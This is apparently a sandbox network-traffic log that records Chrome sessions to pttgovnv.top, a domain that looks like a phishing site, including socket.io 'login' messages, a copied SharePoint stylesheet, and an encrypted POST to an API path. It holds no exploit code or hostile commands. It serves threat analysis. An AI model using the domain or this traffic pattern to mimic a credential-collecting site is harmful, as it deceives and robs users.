          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NT8QsUVsal6B8DJ%2Fzq5l%2FelUCiZG7UIMbe9cNt8WKAVvUKPgTJaVMVeNHwWx3u7VEQTGgoOVZwAhwXA1EAEdrMr325H%2BMyK4UmwC8O3Sz6H3Q2vR3m54DDJzF23EWz8%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0a5e7c5e6a-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 7d
          Data Ascii: 40{"sid":"f3U2DoJjZHCPecWkBQUD"}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          43192.168.2.44978235.190.80.1443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC480OUTPOST /report/v4?s=IZ%2BvZmJal%2Fiwbtd5ooJ2LwDJoBvEsV%2F18E9do5HzNHBoHTcAkMlvZZgRFYrRUq8a13PZOk2zOmlvM87fMHsK5jeiwwxP%2FD49sGVB9aBSVwze6%2BEa0yhJsn%2BVc2ki4VY%3D HTTP/1.1
          Host: a.nel.cloudflare.com
          Connection: keep-alive
          Content-Length: 415
          Content-Type: application/reports+json
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC415OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 37 37 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 37 2e 32 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 74 74 67 6f 76 6e 76 2e 74 6f 70 2f 61 70
          Data Ascii: [{"age":0,"body":{"elapsed_time":1779,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.47.250","status_code":404,"type":"http.error"},"type":"network-error","url":"https://pttgovnv.top/ap
          2024-09-01 22:25:23 UTC168INHTTP/1.1 200 OK
          Content-Length: 0
          date: Sun, 01 Sep 2024 22:25:23 GMT
          Via: 1.1 google
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          44192.168.2.449785104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLHG&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC616INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 58
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEeIVjW3q09nkU1P%2Flx46JMF2YP3yfy8XAj41zBlXeM4CLCvSUKXJXBlpQ4uBP94mORs7MOs9StzH0v98JWIeqWQPmAqHXwhHJTlRzm9i5qnTTuUDwUfQccvyw9WQ2E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0c3a49c332-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC58INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 33 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 74 72 75 65 5d
          Data Ascii: 42["online-count-user",3,"user-f3U2DoJjZHCPecWkBQUD",true]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          45192.168.2.449784172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC627OUTGET /help/assets/8b4af40ckFGym.css HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/assets/2dd339f2kFGym.css
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC745INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:23 GMT
          Content-Type: text/css; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"5291a-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36232
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcIhZY7MCufs1LBYM5WpM0wv%2FmDZivIai4kxcybZc4j3CuAw44vYkaz127QPPxZNzyMAwLT%2FVV%2B91LZZNWnWLBXBuhIur91oD28XuKC03oLCRAaLnTmpGT3CRGlpe9s%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0c4b0a43fe-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:23 UTC624INData Raw: 37 63 63 36 0d 0a ef bb bf 2f 2a 20 5f 6c 63 69 64 3d 22 31 30 35 35 22 20 5f 76 65 72 73 69 6f 6e 3d 22 31 36 2e 30 2e 34 36 38 31 22 0d 0a 5f 4c 6f 63 61 6c 42 69 6e 64 69 6e 67 20 2a 2f 0d 0a 62 6f 64 79 2c 0d 0a 2e 6d 73 2d 63 6f 72 65 2d 64 65 66 61 75 6c 74 46 6f 6e 74 2c 0d 0a 23 70 61 67 65 53 74 61 74 75 73 42 61 72 2c 0d 0a 2e 6d 73 2d 73 74 61 74 75 73 2d 6d 73 67 2c 0d 0a 2e 6a 73 2d 63 61 6c 6c 6f 75 74 2d 62 6f 64 79 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 46 6f 6e 74 28 74 68 65 6d 65 46 6f 6e 74 3a 22 62 6f 64 79 22 29 5d 20 2a 2f 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 22 53 65 67 6f 65 22 2c 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a
          Data Ascii: 7cc6/* _lcid="1055" _version="16.0.4681"_LocalBinding */body,.ms-core-defaultFont,#pageStatusBar,.ms-status-msg,.js-callout-body{/* [ReplaceFont(themeFont:"body")] */ font-family:"Segoe UI","Segoe",Tahoma,Helvetica,Arial,sans-serif;
          2024-09-01 22:25:23 UTC1369INData Raw: 6f 72 3a 23 66 66 66 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 3e 20 2e 6d 73 2d 63 6f 72 65 2d 6e 65 65 64 49 45 46 69 6c 74 65 72 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 42 47 49 6d 61 67 65 5d 20 2a 2f 20 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 41 6c 70 68 61 49 6d 61 67 65 4c 6f 61 64 65 72 28 73 72 63 3d 27 61 62 6f 75 74 3a 62 6c 61 6e 6b 27 2c 73 69 7a 69 6e 67 4d 65 74 68 6f 64 3d 27 73 63 61 6c 65 27 29 3b 22 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 0d 0a 7b
          Data Ascii: or:#fff;background-size:cover;background-repeat:no-repeat;}html > .ms-core-needIEFilter{/* [ReplaceBGImage] */ -ms-filter:"progid:DXImageTransform.Microsoft.AlphaImageLoader(src='about:blank',sizingMethod='scale');";}.ms-backgroundImage{
          2024-09-01 22:25:23 UTC1369INData Raw: 3a 23 32 36 32 36 32 36 3b 0d 0a 7d 0d 0a 68 35 2c 2e 6d 73 2d 68 35 0d 0a 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 7d 0d 0a 68 36 2c 2e 6d 73 2d 68 36 0d 0a 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 7d 0d 0a 69 6d 67 0d 0a 7b 0d 0a 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0d 0a 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 7d 0d 0a 69 66 72 61 6d 65 0d 0a 7b 0d 0a 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 68 72 0d 0a 7b 0d 0a 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 70 78 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 53 75 62 74 6c 65 4c 69 6e 65 73 22 29 5d 20 2a 2f 20 62 6f 72 64 65 72 2d
          Data Ascii: :#262626;}h5,.ms-h5{font-size:1em;}h6,.ms-h6{font-size:1em;}img{border:none;-webkit-tap-highlight-color:transparent;}iframe{border:none;}hr{border-width:0px;/* [ReplaceColor(themeColor:"SubtleLines")] */ border-
          2024-09-01 22:25:23 UTC1369INData Raw: 6f 6c 6f 72 3a 23 66 64 66 64 66 64 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 42 75 74 74 6f 6e 42 61 63 6b 67 72 6f 75 6e 64 22 29 5d 20 2a 2f 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 64 66 64 66 64 3b 0d 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 46 6f 6e 74 28 74 68 65 6d 65 46 6f 6e 74 3a 22 62 6f 64 79 22 29 5d 20 2a 2f 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 22 53 65 67 6f 65 22 2c 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65
          Data Ascii: olor:#fdfdfd;/* [ReplaceColor(themeColor:"ButtonBackground")] */ background-color:#fdfdfd;margin-left:10px;/* [ReplaceFont(themeFont:"body")] */ font-family:"Segoe UI","Segoe",Tahoma,Helvetica,Arial,sans-serif;font-size:11px;/* [ReplaceColor(the
          2024-09-01 22:25:23 UTC1369INData Raw: 69 76 65 2c 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 3a 61 63 74 69 76 65 2c 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 61 63 74 69 76 65 2c 0d 0a 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 42 75 74 74 6f 6e 50 72 65 73 73 65 64 42 6f 72 64 65 72 22 29 5d 20 2a 2f 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 61 38 64 64 34 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 42 75 74 74 6f 6e 50 72 65 73 73 65 64 42 61 63 6b 67 72 6f 75 6e 64 22 2c 6f 70 61 63 69 74 79 3a 22 31 22 29 5d 20 2a 2f 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 39 32 62 37 64 31 3b 0d 0a
          Data Ascii: ive,input[type=reset]:active,input[type=submit]:active,button:active{/* [ReplaceColor(themeColor:"ButtonPressedBorder")] */ border-color:#2a8dd4;/* [ReplaceColor(themeColor:"ButtonPressedBackground",opacity:"1")] */ background-color:#92b7d1;
          2024-09-01 22:25:23 UTC1369INData Raw: 65 31 65 31 65 31 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 44 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 22 2c 6f 70 61 63 69 74 79 3a 22 31 22 29 5d 20 2a 2f 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 64 66 64 66 64 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 44 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 22 29 5d 20 2a 2f 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 64 66 64 66 64 3b 0d 0a 7d 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 5b 64 69 73 61 62 6c 65 64 5d 2c 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 72 65 73 65 74 5d 5b 64 69 73 61 62 6c 65 64 5d 2c 0d 0a 69 6e 70 75 74 5b 74 79
          Data Ascii: e1e1e1;/* [ReplaceColor(themeColor:"DisabledBackground",opacity:"1")] */ background-color:#fdfdfd;/* [ReplaceColor(themeColor:"DisabledBackground")] */ background-color:#fdfdfd;}input[type=button][disabled],input[type=reset][disabled],input[ty
          2024-09-01 22:25:23 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 77 69 64 74 68 3a 31 35 70 78 3b 0d 0a 68 65 69 67 68 74 3a 31 34 70 78 3b 0d 0a 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 73 69 74 65 61 63 74 69 6f 6e 73 2d 69 6d 67 73 70 61 6e 20 3e 20 2e 6d 73 2d 63 6f 72 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 49 63 6f 6e 0d 0a 7b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 74 6f 70 3a 2d 31 30 32 70 78 3b 0d 0a 6c 65 66 74 3a 2d 32 35 31 70 78 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 73 69 74 65 61 63 74 69 6f 6e 73 2d 68 6f 76 65 72 20 2e 6d 73 2d 73 69 74 65 61 63 74 69 6f 6e 73 2d 69 6d 67 73 70 61 6e 20 3e 20 2e 6d 73 2d 63 6f 72 65 2d 6d 65
          Data Ascii: display:inline-block;width:15px;height:14px;overflow:hidden;position:relative;}.ms-siteactions-imgspan > .ms-core-menu-buttonIcon{position:absolute;top:-102px;left:-251px;}.ms-siteactions-hover .ms-siteactions-imgspan > .ms-core-me
          2024-09-01 22:25:23 UTC1369INData Raw: 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 54 6f 70 42 61 72 50 72 65 73 73 65 64 54 65 78 74 22 29 5d 20 2a 2f 20 63 6f 6c 6f 72 3a 23 30 30 34 64 38 35 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 77 65 6c 63 6f 6d 65 2d 68 6f 76 65 72 2c 0d 0a 2e 6d 73 2d 73 69 74 65 61 63 74 69 6f 6e 73 2d 68 6f 76 65 72 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 42 61 63 6b 67 72 6f 75 6e 64 4f 76 65 72 6c 61 79 22 2c 6f 70 61 63 69 74 79 3a 22 31 22 29 5d 20 2a 2f 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a
          Data Ascii: [ReplaceColor(themeColor:"TopBarPressedText")] */ color:#004d85;text-decoration:none;}.ms-welcome-hover,.ms-siteactions-hover{/* [ReplaceColor(themeColor:"BackgroundOverlay",opacity:"1")] */ background-color:#fff;/* [ReplaceColor(themeColor:
          2024-09-01 22:25:23 UTC1369INData Raw: 64 41 63 74 69 6f 6e 42 75 74 74 6f 6e 2d 74 65 78 74 0d 0a 7b 0d 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 54 6f 70 42 61 72 54 65 78 74 22 29 5d 20 2a 2f 20 63 6f 6c 6f 72 3a 23 36 36 36 3b 0d 0a 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 38 70 74 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 70 72 6f 6d 6f 74 65 64 41 63 74 69 6f 6e 42 75 74 74 6f 6e 3a 68 6f 76 65 72 20 2e 6d 73 2d 70 72 6f 6d 6f 74 65 64 41 63 74 69 6f 6e 42 75 74 74 6f 6e 2d 74 65 78 74 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 54 6f 70 42 61 72 48 6f 76 65 72 54 65 78 74
          Data Ascii: dActionButton-text{display:inline-block;/* [ReplaceColor(themeColor:"TopBarText")] */ color:#666;text-transform:none;font-size:8pt;}.ms-promotedActionButton:hover .ms-promotedActionButton-text{/* [ReplaceColor(themeColor:"TopBarHoverText
          2024-09-01 22:25:23 UTC1369INData Raw: 65 22 29 5d 20 2a 2f 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 20 4c 69 67 68 74 22 2c 22 53 65 67 6f 65 20 55 49 22 2c 22 53 65 67 6f 65 22 2c 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 43 6f 6c 6f 72 28 74 68 65 6d 65 43 6f 6c 6f 72 3a 22 53 69 74 65 54 69 74 6c 65 22 29 5d 20 2a 2f 20 63 6f 6c 6f 72 3a 23 32 36 32 36 32 36 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 63 6f 72 65 2d 70 61 67 65 54 69 74 6c 65 0d 0a 7b 0d 0a 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 37 37 65 6d 3b 0d 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0d 0a 7d 0d 0a 2e 6d 73 2d 63 6f 72 65 2d 70 61 67 65 54 69 74 6c 65 20 61 3a 68 6f 76 65 72 2c 0d 0a 2e 6d 73 2d
          Data Ascii: e")] */ font-family:"Segoe UI Light","Segoe UI","Segoe",Tahoma,Helvetica,Arial,sans-serif;/* [ReplaceColor(themeColor:"SiteTitle")] */ color:#262626;}.ms-core-pageTitle{font-size:2.77em;white-space:nowrap;}.ms-core-pageTitle a:hover,.ms-


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          46192.168.2.449786172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 49
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          Content-type: text/plain;charset=UTF-8
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:23 UTC49OUTData Raw: 34 32 30 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 66 33 55 32 44 6f 4a 6a 5a 48 43 50 65 63 57 6b 42 51 55 44 22 2c 5b 22 75 73 65 72 22 5d 5d
          Data Ascii: 420["login","user-f3U2DoJjZHCPecWkBQUD",["user"]]
          2024-09-01 22:25:24 UTC608INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32rwhmRrCJlLLCdKF7NMIqBTa6yViV8GivJyN5JzXiT9AgkUEEmf3cCFlIzX2n4SNXlYjkz7XV43H7aq0aNJ6gL21lFRu54dXgDFxqz0uRsd8QNcQO%2FgnfE3f5pYo1Q%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0c7c8841a9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-09-01 22:25:24 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          47192.168.2.449787172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:23 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:24 UTC620INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:24 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 98
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFSE6bf%2FDwhfTLm796v0FBedb%2Fibd8B5mVRpQSOhXMlLyoipcjlh9fWqTcwOBfL9cAqi2KPRYMaWps%2Fet8ZELS0PhvIxfDDjPBHMohckH0G4Z7ullLdQRlkdkJ1CHKw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad0caabc42fb-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:24 UTC98INData Raw: 34 33 30 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 53 75 6e 20 53 65 70 20 30 31 20 32 30 32 34 20 32 32 3a 32 35 3a 32 33 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
          Data Ascii: 430[{"code":0,"msg":"ok","time":"Sun Sep 01 2024 22:25:23 GMT+0000 (Coordinated Universal Time)"}]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          48192.168.2.449788172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:24 UTC618OUTPOST /api/MC4zMTIwODY0MDU2MjE5NDY4 HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          Content-Length: 300
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-platform: "Windows"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Content-Type: text/encrypt
          Accept: */*
          Origin: https://pttgovnv.top
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
